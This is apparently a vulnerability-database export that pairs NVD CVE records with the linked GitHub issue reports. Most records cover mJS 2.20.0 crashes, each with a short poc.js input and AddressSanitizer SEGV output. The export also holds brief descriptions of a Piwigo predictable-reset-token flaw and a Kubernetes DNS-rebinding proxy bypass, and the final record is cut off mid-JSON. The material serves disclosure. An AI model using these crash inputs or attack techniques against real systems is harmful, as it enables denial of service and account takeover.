{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/221" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*", "matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/cesanta/mjs/issues/221
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
###### mJS revision Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551) ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash vim Makefile DOCKER_GCC=gcc $(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG) # save the makefile then make make ``` ###### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript chr([ print( chr([ print( JSON.stringify([ chr--( print([ JSON.parse( '0.255.0.0' ), ]) ), chr( print([ JSON.parse( '0.255.0.0' ), ]) ), ]) ), ]) ), ]); ``` </code></pre> </details> ​ ###### Execution steps & Output ```bash $ ./mjs/build/mjs poc.js <array> <array> ASAN:DEADLYSIGNAL ================================================================= ==125301==ERROR: AddressSanitizer: SEGV on unknown address 0x55dae32d710c (pc 0x55dae32d717f bp 0x000000000130 sp 0x7ffc72c4b168 T0) ==125301==The signal is caused by a WRITE memory access. #0 0x55dae32d717e (/usr/local/bin/mjs+0x2c17e) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/usr/local/bin/mjs+0x2c17e) ==125301==ABORTING ```
SEGV (/usr/local/bin/mjs+0x2c17e)
https://api.github.com/repos/cesanta/mjs/issues/221/comments
0
2021-12-31T08:01:57Z
2021-12-31T08:01:57Z
https://github.com/cesanta/mjs/issues/221
1,091,465,349
221
CVE-2021-46548
2022-01-27T21:15:11.093
Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via add_lineno_map_item at src/mjs_bcode.c. This vulnerability can lead to a Denial of Service (DoS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/228" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*", "matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/cesanta/mjs/issues/228
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
###### mJS revision Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551) ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash vim Makefile DOCKER_GCC=gcc $(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG) # save the makefile then make make ``` ###### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript (JSON.stringify([1, 2, 3]))(((print-6.32*(823))-6.32*21e2)(JSON.parse(JSON.stringify([(0)]))));J ``` </code></pre> </details> ​ ###### Execution steps & Output ```bash $ ./mjs/build/mjs poc.js ASAN:DEADLYSIGNAL ================================================================= ==82386==ERROR: AddressSanitizer: SEGV on unknown address 0x0000000000e4 (pc 0x55a4aeab6fd4 bp 0x00000000008c sp 0x7ffc17a28520 T0) ==82386==The signal is caused by a READ memory access. ==82386==Hint: address points to the zero page. #0 0x55a4aeab6fd3 in add_lineno_map_item src/mjs_bcode.c:15 #1 0x55a4aeab6fd3 in emit_int src/mjs_bcode.c:47 #2 0x55a4aeb600dd in parse_comparison src/mjs_parser.c:431 #3 0x55a4aeb600dd in parse_equality src/mjs_parser.c:435 #4 0x55a4aeb65d0b in parse_bitwise_and src/mjs_parser.c:440 #5 0x55a4aeb65d0b in parse_bitwise_xor src/mjs_parser.c:445 #6 0x55a4aeb32177 in parse_bitwise_or src/mjs_parser.c:450 #7 0x55a4aeb32177 in parse_logical_and src/mjs_parser.c:455 #8 0x55a4aeb32177 in parse_logical_or src/mjs_parser.c:460 #9 0x55a4aeb32177 in parse_ternary src/mjs_parser.c:465 #10 0x55a4aeb32177 in parse_assignment src/mjs_parser.c:503 #11 0x55a4aeb388d7 in parse_expr src/mjs_parser.c:507 #12 0x55a4aeb388d7 in parse_statement src/mjs_parser.c:945 AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV src/mjs_bcode.c:15 in add_lineno_map_item ==82386==ABORTING ``` Credits: Found by OWL337 team.
SEGV src/mjs_bcode.c:15 in add_lineno_map_item
https://api.github.com/repos/cesanta/mjs/issues/228/comments
0
2021-12-31T08:09:27Z
2022-01-12T02:22:49Z
https://github.com/cesanta/mjs/issues/228
1,091,467,987
228
CVE-2021-46549
2022-01-27T21:15:11.137
Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via parse_cval_type at src/mjs_ffi.c. This vulnerability can lead to a Denial of Service (DoS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/224" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*", "matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/cesanta/mjs/issues/224
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
###### mJS revision Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551) ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash vim Makefile DOCKER_GCC=gcc $(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG) # save the makefile then make make ``` ###### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript (JSON.stringify([1, 2, 3]))((JSON.stringify-6.5*321e2)(JSON.stringify([1, 2, 3]))); ``` </code></pre> </details> ###### Execution steps & Output ```bash $ ./mjs/build/mjs poc.js ASAN:DEADLYSIGNAL ================================================================= ==85157==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55e826c7824e bp 0x000000000080 sp 0x7ffe9212b1c8 T0) ==85157==The signal is caused by a READ memory access. ==85157==Hint: address points to the zero page. #0 0x55e826c7824d in parse_cval_type src/mjs_ffi.c:50 AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV src/mjs_ffi.c:50 in parse_cval_type ==85157==ABORTING ```
SEGV src/mjs_ffi.c:50 in parse_cval_type
https://api.github.com/repos/cesanta/mjs/issues/224/comments
0
2021-12-31T08:05:23Z
2021-12-31T08:05:23Z
https://github.com/cesanta/mjs/issues/224
1,091,466,611
224
CVE-2021-46550
2022-01-27T21:15:11.183
Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via free_json_frame at src/mjs_json.c. This vulnerability can lead to a Denial of Service (DoS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/230" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*", "matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/cesanta/mjs/issues/230
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
###### mJS revision Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551) ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash vim Makefile DOCKER_GCC=gcc $(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG) # save the makefile then make make ``` ###### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript (JSON.stringify([1, 2, 3]))((JSON.stringify-6.34321e2)(JSON.stringify([1, 2, 3]))); ``` </code></pre> </details> ​ ###### Execution steps & Output ```bash $ ./mjs/build/mjs poc.js > $ Gmjs poc.js ASAN:DEADLYSIGNAL ================================================================= ======ERROR: AddressSanitizer: SEGV on unknown address 0x561b4e461e9c (pc 0x561b4e461ed5 bp 0x000000000080 sp 0x7ffdacf6fb18 T0) ======The signal is caused by a WRITE memory access. #0 0x561b4e461ed4 in free_json_frame src/mjs_json.c:323 #1 0x561b4e461ed4 in mjs_json_parse src/mjs_json.c:476 #2 0x7ffdacf6fc0f (<unknown module>) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV src/mjs_json.c:323 in free_json_frame ======ABORTING ``` Credits: Found by OWL337 team.
SEGV src/mjs_json.c:323 in free_json_frame
https://api.github.com/repos/cesanta/mjs/issues/230/comments
0
2021-12-31T08:11:01Z
2022-01-12T02:23:13Z
https://github.com/cesanta/mjs/issues/230
1,091,468,550
230
CVE-2021-46553
2022-01-27T21:15:11.227
Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via mjs_set_internal at src/mjs_object.c. This vulnerability can lead to a Denial of Service (DoS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/226" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*", "matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/cesanta/mjs/issues/226
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
###### mJS revision Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551) ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash vim Makefile DOCKER_GCC=gcc $(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG) # save the makefile then make make ``` ###### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript (JSON.stringify([1, 2, 3]))((load - 6. + 4321e2)([([JSON.parse(JSON.stringify([(0)]))])])); ``` </code></pre> </details> ​ ###### Execution steps & Output ```bash $ ./mjs/build/mjs poc.js ASAN:DEADLYSIGNAL ================================================================= ==51917==ERROR: AddressSanitizer: SEGV on unknown address 0xffffffffffffff81 (pc 0x5576b72e39f0 bp 0x000000000081 sp 0x7ffd4baed160 T0) ==51917==The signal is caused by a READ memory access. #0 0x5576b72e39ef in mjs_set_internal src/mjs_object.c:207 #1 0x5576b72e39ef in mjs_set_v src/mjs_object.c:155 AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV src/mjs_object.c:207 in mjs_set_internal ==51917==ABORTING ``` Credits: Found by OWL337 team.
SEGV src/mjs_object.c:207 in mjs_set_internal
https://api.github.com/repos/cesanta/mjs/issues/226/comments
0
2021-12-31T08:07:24Z
2022-01-12T02:22:36Z
https://github.com/cesanta/mjs/issues/226
1,091,467,307
226
CVE-2021-46554
2022-01-27T21:15:11.270
Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via mjs_json_stringify at src/mjs_json.c. This vulnerability can lead to a Denial of Service (DoS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/229" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*", "matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/cesanta/mjs/issues/229
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
###### mJS revision Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551) ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash vim Makefile DOCKER_GCC=gcc $(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG) # save the makefile then make make ``` ###### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript (JSON.stringify([1, 2, 3]))((JSON.parse-6.54*21e2)(JSON.stringify([1, 2, 3]))); ``` </code></pre> </details> ​ ###### Execution steps & Output ```bash $ ./mjs/build/mjs poc.js ASAN:DEADLYSIGNAL ================================================================= ==61059==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x56205ea42cf1 bp 0x00000000007c sp 0x7ffdf0132cb8 T0) ==61059==The signal is caused by a READ memory access. ==61059==Hint: address points to the zero page. #0 0x56205ea42cf0 in mjs_json_stringify src/mjs_json.c:273 #1 0x56205ea42cf0 in mjs_json_stringify src/mjs_json.c:272 #2 0x56205ea42cf0 in mjs_json_stringify src/mjs_json.c:272 #3 0x56205ea42cf0 in mjs_op_json_stringify src/mjs_json.c:494 #4 0x56205ead6955 in cs_varint_decode src/common/cs_varint.c:65 #5 0x56205eaa1a05 in mjs_strcmp src/mjs_string.c:228 #6 0x60b000000082 (<unknown module>) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV src/mjs_json.c:273 in mjs_json_stringify ``` Credits: Found by OWL337 team.
SEGV src/mjs_json.c:273 in mjs_json_stringify
https://api.github.com/repos/cesanta/mjs/issues/229/comments
0
2021-12-31T08:10:12Z
2022-01-12T02:23:01Z
https://github.com/cesanta/mjs/issues/229
1,091,468,269
229
CVE-2021-46556
2022-01-27T21:15:11.317
Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via mjs_bcode_insert_offset at src/mjs_bcode.c. This vulnerability can lead to a Denial of Service (DoS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/227" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*", "matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/cesanta/mjs/issues/227
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
###### mJS revision Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551) ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash vim Makefile DOCKER_GCC=gcc $(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG) # save the makefile then make make ``` ###### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript (JSON.stringify([1, 2, 3]))((load - 6.34 * 21e2)([([JSON.parse(JSON.stringify([(0)]))])])); ``` </code></pre> </details> ​ ###### Execution steps & Output ```bash $ ./mjs/build/mjs poc.js ASAN:DEADLYSIGNAL ================================================================= ==88306==ERROR: AddressSanitizer: SEGV on unknown address 0x00000000008c (pc 0x558644d0edbc bp 0x000000000084 sp 0x7fffa37031f8 T0) ==88306==The signal is caused by a READ memory access. ==88306==Hint: address points to the zero page. #0 0x558644d0edbb in mjs_bcode_insert_offset src/mjs_bcode.c:67 #1 0x7fffa3703a0f (<unknown module>) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV src/mjs_bcode.c:67 in mjs_bcode_insert_offset ==88306==ABORTING ```
SEGV src/mjs_bcode.c:67 in mjs_bcode_insert_offset
https://api.github.com/repos/cesanta/mjs/issues/227/comments
0
2021-12-31T08:08:18Z
2021-12-31T08:08:18Z
https://github.com/cesanta/mjs/issues/227
1,091,467,592
227
CVE-2016-3735
2022-01-28T20:15:08.437
Piwigo is image gallery software written in PHP. When a criteria is not met on a host, piwigo defaults to usingmt_rand in order to generate password reset tokens. mt_rand output can be predicted after recovering the seed used to generate it. This low an unauthenticated attacker to take over an account providing they know an administrators email address in order to be able to request password reset.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": null, "url": "http://piwigo.org/release-2.8.1%2C" }, { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/Piwigo/Piwigo/commit/f51ee90c66527fd7ff634f3e8d414cb670da068d" }, { "source": "[email protected]", "tags": null, "url": "https://github.com/Piwigo/Piwigo/issues/470%2C" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:piwigo:piwigo:*:*:*:*:*:*:*:*", "matchCriteriaId": "294E7F72-0D7D-4B0C-B05E-B58EFB07CF35", "versionEndExcluding": "2.8.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/Piwigo/Piwigo/issues/470%2C
null
github.com
[ "Piwigo", "Piwigo" ]
Current functions used to generate random strings are not "that much random" (depending on the PHP version and operating system).
increase randomness on generate_key
https://api.github.com/repos/Piwigo/Piwigo/issues/470/comments
0
2016-04-26T09:03:40Z
2018-01-15T12:20:36Z
https://github.com/Piwigo/Piwigo/issues/470
151,080,998
470
CVE-2020-8562
2022-02-01T11:15:10.903
As mitigations to a report from 2019 and CVE-2020-8555, Kubernetes attempts to prevent proxied connections from accessing link-local or localhost networks when making user-driven connections to Services, Pods, Nodes, or StorageClass service providers. As part of this mitigation Kubernetes does a DNS name resolution check and validates that response IPs are not in the link-local (169.254.0.0/16) or localhost (127.0.0.0/8) range. Kubernetes then performs a second DNS resolution without validation for the actual connection. If a non-standard DNS server returns different non-cached responses, a user may be able to bypass the proxy IP restriction and access private networks on the control plane.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:S/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3.1, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.6, "impactScore": 1.4, "source": "[email protected]", "type": "Primary" }, { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 2.2, "baseSeverity": "LOW", "confidentialityImpact": "LOW", 